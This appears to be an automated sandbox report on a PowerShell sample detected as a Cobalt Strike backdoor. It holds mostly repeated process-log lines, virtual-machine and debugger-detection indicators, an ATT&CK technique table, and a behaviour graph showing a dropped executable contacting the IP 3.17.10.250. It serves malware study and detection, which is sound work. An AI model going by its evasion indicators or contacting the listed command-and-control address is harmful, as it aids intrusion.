      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2988Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3228Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe TID: 4480Thread sleep count: 34 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe TID: 4480Thread sleep time: -340000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: Amcache.hve.5.drBinary or memory string: VMware
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000ED000.00000004.00000020.00020000.00000000.sdmp, tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_2-856
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,2_2_00401180
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_00402F69 SetUnhandledExceptionFilter,2_2_00402F69
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,2_2_00401A70
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_004092E4 SetUnhandledExceptionFilter,2_2_004092E4
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,2_2_00401630
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00401990
      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      12
      Process Injection
      121
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote ServicesData from Local System1
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Process Injection
      LSASS Memory211
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Obfuscated Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive111
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Software Packing
      NTDS121
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1602897 Sample: fabd6ab15a0540d197f1ceaa312... Startdate: 30/01/2025 Architecture: WINDOWS Score: 100 23 Found malware configuration 2->23 25 Malicious sample detected (through community Yara rule) 2->25 27 Antivirus detection for URL or domain 2->27 29 5 other signatures 2->29 7 powershell.exe 17 2->7         started        process3 file4 19 C:\Users\user\AppData\Local\...\tmpE651.exe, PE32+ 7->19 dropped 31 Found suspicious powershell code related to unpacking or dynamic code loading 7->31 33 Powershell drops PE file 7->33 11 tmpE651.exe 6 7->11         started        15 conhost.exe 7->15         started        signatures5 process6 dnsIp7 21 3.17.10.250, 49731, 80 AMAZON-02US United States 11->21 35 Antivirus detection for dropped file 11->35 37 Multi AV Scanner detection for dropped file 11->37 39 Machine Learning detection for dropped file 11->39 41 Found API chain indicative of debugger detection 11->41 17 WerFault.exe 19 16 11->17         started        signatures8 process9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      fabd6ab15a0540d197f1ceaa312308b8.ps121%ReversingLabsWin64.Backdoor.CobaltStrike
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\tmpE651.exe100%AviraHEUR/AGEN.1345031
      C:\Users\user\AppData\Local\Temp\tmpE651.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\tmpE651.exe87%ReversingLabsWin64.Backdoor.CobaltStrike
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://.17.10.250:80/EkTY0%Avira URL Cloudsafe
